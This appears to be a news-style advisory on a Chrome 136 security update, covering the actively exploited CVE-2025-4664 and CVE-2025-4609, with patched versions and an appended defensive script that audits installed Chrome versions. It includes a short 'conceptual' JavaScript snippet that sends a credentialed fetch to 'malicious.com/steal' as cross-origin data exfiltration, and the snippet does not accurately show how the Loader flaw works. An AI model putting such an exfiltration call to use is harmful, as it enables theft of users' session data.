Google has released a critical security update for Chrome, pushing the Stable channel to version 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux.
This rollout will reach users over the coming days and weeks and addresses four security vulnerabilities, including a high-severity zero-day actively exploited in the wild.
Zero-Day Exploit: CVE-2025-4664
The most urgent fix targets CVE-2025-4664, a flaw described as “insufficient policy enforcement in Loader.”
Security researchers warn that this vulnerability allows remote attackers to bypass Chrome’s internal security policies via crafted HTML, enabling cross-origin data leaks and potentially unauthorized code execution.
The exploit was first disclosed by @slonser_ on May 5, 2025, and Google confirmed active exploitation before the patch release.
Technical analysis indicates attackers could leverage this bug to escape browser sandboxing, a core defense mechanism isolating web content from system resources.
```javascript
// Example: Exploiting insufficient policy enforcement (conceptual)
fetch('https://malicious.com/steal', {
  credentials: 'include'
})
  .then(response => response.text())
  .then(data => {
    // Cross-origin data exfiltration logic
  });
```
Mojo IPC Vulnerability: CVE-2025-4609
Another high-severity bug, CVE-2025-4609, involves the Mojo Inter-Process Communication (IPC) subsystem.
Incorrect handling within this subsystem in unspecified scenarios could enable privilege escalation or memory corruption, particularly on Windows systems.
Such flaws undermine the Chrome sandbox, potentially allowing sandboxed renderer processes to access privileged resources.
Security Engineering and Detection
Google credits external researchers for identifying these vulnerabilities and highlights its ongoing use of advanced memory analysis tools like AddressSanitizer, MemorySanitizer, and libFuzzer.
AddressSanitizer, for instance, instruments code to detect out-of-bounds memory accesses and use-after-free bugs, providing real-time detection with minimal performance overhead.
Additional Security Enhancements
- Chrome 136 introduces privacy improvements, such as reducing fingerprinting via the `Accept-Language` header and partitioning `:visited` link history to prevent cross-site history leaks.
- The update also includes a new policy to “de-elevate” Chrome if launched with administrator privileges, reducing the risk of malware gaining system-level access through the browser.
Update Guidance
Users are strongly advised to update Chrome immediately by navigating to chrome://settings/help.
The patched versions are:
- Windows/Mac: 136.0.7103.113/.114
- Linux: 136.0.7103.113
- Android: 136.0.7103.125 (via Google Play)
With active exploitation reported, prompt updating is critical to mitigate risk from these vulnerabilities.
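For teams tracking the rollout across many machines, the following added example (not from Google or the original article) checks an inventory of installed Chrome versions against the patched builds listed above. The inventory rows, hostnames and function names are constructed for illustration, and the lower build (.113) is assumed as the minimum for Windows and Mac.

```python
# Added example: audit a browser inventory against the patched builds listed above.
# Inventory rows are constructed sample data; hostnames are hypothetical.
import re

# Minimum patched Stable builds, taken from the list in this article.
PATCHED = {
    "windows": (136, 0, 7103, 113),
    "mac": (136, 0, 7103, 113),
    "linux": (136, 0, 7103, 113),
    "android": (136, 0, 7103, 125),
}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)$")

def parse_version(text):
    """Return a 4-tuple of ints, or None if the string is not a.b.c.d."""
    m = VERSION_RE.match(text.strip())
    return tuple(int(p) for p in m.groups()) if m else None

def classify(platform, version_text):
    """Return 'patched', 'vulnerable', or 'unknown' for one installation."""
    minimum = PATCHED.get(platform.strip().lower())
    version = parse_version(version_text)
    if minimum is None or version is None:
        return "unknown"  # unparseable data needs manual follow-up, not a pass
    # Tuple comparison is numeric per component, so 136.0.7103.92 sorts below
    # 136.0.7103.113 (a plain string comparison would get this wrong).
    return "patched" if version >= minimum else "vulnerable"

def audit(rows):
    """rows: iterable of (host, platform, version). Returns rows needing action."""
    findings = []
    for host, platform, version in rows:
        status = classify(platform, version)
        if status != "patched":
            findings.append((host, platform, version, status))
    return findings

# Constructed sample inventory (not real hosts).
SAMPLE_INVENTORY = [
    ("ws-001", "Windows", "136.0.7103.114"),
    ("ws-002", "Windows", "136.0.7103.92"),
    ("mb-003", "Mac", "135.0.7049.115"),
    ("lx-004", "Linux", "136.0.7103.113"),
    ("ph-005", "Android", "136.0.7103.113"),
    ("ws-006", "Windows", "unknown"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_INVENTORY):
        print(*finding, sep="\t")
```

Rows reported as "unknown" are treated as needing action so that missing or malformed version data is never counted as patched.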